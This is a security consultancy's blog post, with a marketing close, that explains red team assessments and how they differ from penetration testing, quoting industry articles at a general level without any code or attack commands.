The “battle” for the security of your digital assets is an ongoing effort to stay ahead of cyber criminals, hackers and assorted bad actors. The concepts of “battle” or “military incursion” also give rise to adopting techniques across industry boundaries. Specifically, the concept of war-gaming the security infrastructure through Red Teams.
What Is A Red Team Assessment And Why Should You Care?
The entire premise of red teaming is to play the role of an attacker in order to make your team better at defense. A CSO Online article offers this description of red teams:
“Red teams are external entities brought in to test the effectiveness of a security program. They are hired to emulate the behaviors and techniques of likely attackers to make it as realistic as possible.
For example, this team may try and get into a business building by pretending to be a delivery driver in order to plant a device for easy outside access (think port 80, 443, 53 for HTTP, HTTPS or DNS respectively). They may try also try social engineering, phishing, vishing or simply posing as a company employee.”
The article goes on to say:
“The ultimate aim of such test is to test an organization's’ security maturity as well as its ability to detect and respond to an attack. Such an exercise could take up to three or four weeks depending on the simulation, the people involved and the attacks being tested.”
But isn’t this exactly why we have doing penetration testing and security assessments for years? What is new?
The Role Of Penetration Testing In Read Teaming
There is definitely confusion on the differences between Red Teaming and Penetration testing. According to Security Intelligence article titled “Penetration Testing Versus Red Teaming: Clearing the Confusion”:
“Similar to scenario-based penetration tests, red team engagements are designed to achieve specific goals, such as gaining access to a sensitive server or business-critical application.
Red teaming projects differ in that they are heavily focused on emulating an advanced threat actor using stealth, subverting established defensive controls and identifying gaps in the organization’s defensive strategy.
The value of this type of engagement can be derived from a better understanding of how an organization detects and responds to real-world attacks.”
The article goes on to also offer:
“Red team exercises typically focus on living off the land, relying on existing tools that are already built into the operating system. We strive to only use tooling when the team is confident it can help to evade or bypass endpoint detection and response solutions or avoid common threat hunting queries by dedicated teams focused on finding nefarious activities through PowerShell/Sysmon/event logs.
During a red team engagement, the team is more focused on targeting DevOps and end users and using the least obvious ways to gain the minimum elevated privileges required to achieve its objectives.”
Because of this approach does leave the potential for undiscovered vulnerabilities, it is also necessary to do specific security assessments targeted to applications, networks, mobile, IoT, cloud and cloud native targets.
Whether vulnerabilities are uncovered by red teaming or penetration testing, all security threat assessments should go beyond identifying security defects. They should focus on helping you meaningfully triage and fix vulnerabilities discovered during testing. What is needed is exceptional remediation advice that is specific, actionable, and aimed at reducing engineering overhead typically associated with mitigating security issues.
So, the best advice is the use of both red teaming and penetration testing in concert with one another to be most effective. It is not a question of either/or it is a question of both/when.
A comprehensive strategy to increase the likelihood of protection of all technology assets will require a view to DevSecOps that includes security assessments, developer training as well as a red team strategy. Establishing a relationship with a proven and trusted partner will further ensure success.
nVisium empowers organizations to eliminate application and cloud security vulnerabilities before cyber threats exploit them with proven in-depth security assessments, remediation and training programs. Our experienced team of security-savvy developers and engineers guide organizations to build best practices with high ROI into their engineering and secure development lifecycles across applications, operating systems, networks, mobile, cloud and IoT through services, software solutions and R&D unique to business operations and compliance initiatives. Additionally, nVisium provides a fully managed platform for tracking and measuring performance as well as instructor-led and online training.
Call us when you are ready to add security assessments to your red team strategy or better yet, schedule a consultation today or download our new eBook titled “Demystifying DevSecOps” to get started yourself.